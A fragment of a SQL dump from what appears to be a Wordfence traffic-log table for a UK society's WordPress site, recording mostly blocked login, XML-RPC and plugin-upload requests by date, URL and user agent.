Network',NULL),(10865,0.000000,1630678405.753606,'\0\0\0\0\0\0\0\0\0\0��\"}6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10866,0.000000,1630678791.404784,'\0\0\0\0\0\0\0\0\0\0�����(',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10867,0.000000,1630678883.432106,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10868,0.000000,1630679356.707889,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10869,0.000000,1630679853.954443,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10870,0.000000,1630680365.149512,'\0\0\0\0\0\0\0\0\0\0����t\r',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10871,0.000000,1630680820.164311,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10872,0.000000,1630681094.039716,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10873,0.000000,1630681690.603529,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10874,0.000000,1630681952.056050,'\0\0\0\0\0\0\0\0\0\0���6�',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10875,0.000000,1630682177.391357,'\0\0\0\0\0\0\0\0\0\0��PP��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10876,0.000000,1630682462.941278,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10877,1630682464.724715,1630682464.643200,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10878,0.000000,1630682643.755839,'\0\0\0\0\0\0\0\0\0\0���:�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(10879,0.000000,1630683155.241843,'\0\0\0\0\0\0\0\0\0\0��gzj�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10880,0.000000,1630683388.851936,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10881,0.000000,1630683656.799826,'\0\0\0\0\0\0\0\0\0\0��6��-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10882,0.000000,1630684148.942932,'\0\0\0\0\0\0\0\0\0\0����<',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10883,0.000000,1630684637.055188,'\0\0\0\0\0\0\0\0\0\0���G�k',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10884,0.000000,1630685129.937342,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10885,0.000000,1630685649.093130,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10886,0.000000,1630685726.067471,'\0\0\0\0\0\0\0\0\0\0��@o~ ',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10887,0.000000,1630686063.990041,'\0\0\0\0\0\0\0\0\0\0��3Dx�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10888,0.000000,1630686178.696560,'\0\0\0\0\0\0\0\0\0\0���t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10889,0.000000,1630687094.485399,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10890,0.000000,1630688048.154960,'\0\0\0\0\0\0\0\0\0\0���/�\"',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10891,0.000000,1630688522.339541,'\0\0\0\0\0\0\0\0\0\0��h�*d',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10892,0.000000,1630689657.372638,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10893,1630689658.743177,1630689658.634000,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10894,0.000000,1630689672.022423,'\0\0\0\0\0\0\0\0\0\0�����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10895,1630689674.303227,1630689674.189200,'\0\0\0\0\0\0\0\0\0\0�����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10896,0.000000,1630689949.571609,'\0\0\0\0\0\0\0\0\0\0��g�\n�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10897,0.000000,1630690366.611074,'\0\0\0\0\0\0\0\0\0\0���,',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10898,0.000000,1630691389.942341,'\0\0\0\0\0\0\0\0\0\0���6�N',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10899,1630691392.047674,1630691391.965500,'\0\0\0\0\0\0\0\0\0\0���6�N',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10900,0.000000,1630691439.924954,'\0\0\0\0\0\0\0\0\0\0��P��',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10901,0.000000,1630691800.303930,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10902,1630691805.469407,1630691805.349200,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10903,0.000000,1630692834.406204,'\0\0\0\0\0\0\0\0\0\0��X&�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10904,0.000000,1630692888.906494,'\0\0\0\0\0\0\0\0\0\0���Go',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10905,0.000000,1630695459.349872,'\0\0\0\0\0\0\0\0\0\0��\"]$d',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10906,0.000000,1630695859.726848,'\0\0\0\0\0\0\0\0\0\0���O�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10907,0.000000,1630696244.980848,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10908,1630696248.499637,1630696248.408600,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10909,0.000000,1630696577.455323,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10910,1630696579.428540,1630696579.311000,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10911,0.000000,1630697973.695993,'\0\0\0\0\0\0\0\0\0\0��h�u',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10912,0.000000,1630698009.969460,'\0\0\0\0\0\0\0\0\0\0����\"E',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10913,0.000000,1630698449.697149,'\0\0\0\0\0\0\0\0\0\0��#ÇC',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10914,0.000000,1630699262.416212,'\0\0\0\0\0\0\0\0\0\0���c�9',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10915,0.000000,1630699892.915672,'\0\0\0\0\0\0\0\0\0\0��@�5?',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10916,0.000000,1630700399.267665,'\0\0\0\0\0\0\0\0\0\0��\"�1�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10917,0.000000,1630701064.430757,'\0\0\0\0\0\0\0\0\0\0��B��',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10918,0.000000,1630701634.514070,'\0\0\0\0\0\0\0\0\0\0��B!�~',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10919,0.000000,1630702170.726018,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10920,0.000000,1630702698.685577,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10921,0.000000,1630702700.024464,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10922,0.000000,1630703231.350346,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10923,0.000000,1630703741.954618,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10924,0.000000,1630704143.061030,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10925,1630704144.691497,1630704144.610100,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10926,0.000000,1630704253.476923,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10927,0.000000,1630704790.895096,'\0\0\0\0\0\0\0\0\0\0��`>w',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10928,0.000000,1630704861.613223,'\0\0\0\0\0\0\0\0\0\0���]�S',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10929,0.000000,1630705213.526300,'\0\0\0\0\0\0\0\0\0\0���ݹ\n',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10930,0.000000,1630705319.525186,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10931,1630705320.883154,1630705320.786100,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10932,0.000000,1630705401.382484,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10933,1630705402.760616,1630705402.642200,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10934,0.000000,1630705694.521201,'\0\0\0\0\0\0\0\0\0\0��B!�~',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10935,0.000000,1630706153.467174,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10936,0.000000,1630706620.417450,'\0\0\0\0\0\0\0\0\0\0��Uy\\',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10937,0.000000,1630706919.245251,'\0\0\0\0\0\0\0\0\0\0��4��~',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10938,0.000000,1630707145.957315,'\0\0\0\0\0\0\0\0\0\0��˫�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10939,0.000000,1630707618.669905,'\0\0\0\0\0\0\0\0\0\0����56',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10940,0.000000,1630708145.144472,'\0\0\0\0\0\0\0\0\0\0��QDD�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10941,0.000000,1630708988.766536,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10942,0.000000,1630709183.949966,'\0\0\0\0\0\0\0\0\0\0��>���',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10943,0.000000,1630709710.378446,'\0\0\0\0\0\0\0\0\0\0��Ú��',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10944,0.000000,1630709712.970358,'\0\0\0\0\0\0\0\0\0\0���)',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10945,0.000000,1630710223.906763,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10946,0.000000,1630710772.817053,'\0\0\0\0\0\0\0\0\0\0����Z�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10947,0.000000,1630711072.107280,'\0\0\0\0\0\0\0\0\0\0��/� ',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10948,0.000000,1630711342.507097,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10949,0.000000,1630711864.491412,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10950,0.000000,1630712460.856704,'\0\0\0\0\0\0\0\0\0\0�����1',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10951,0.000000,1630713023.125293,'\0\0\0\0\0\0\0\0\0\0���]��',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 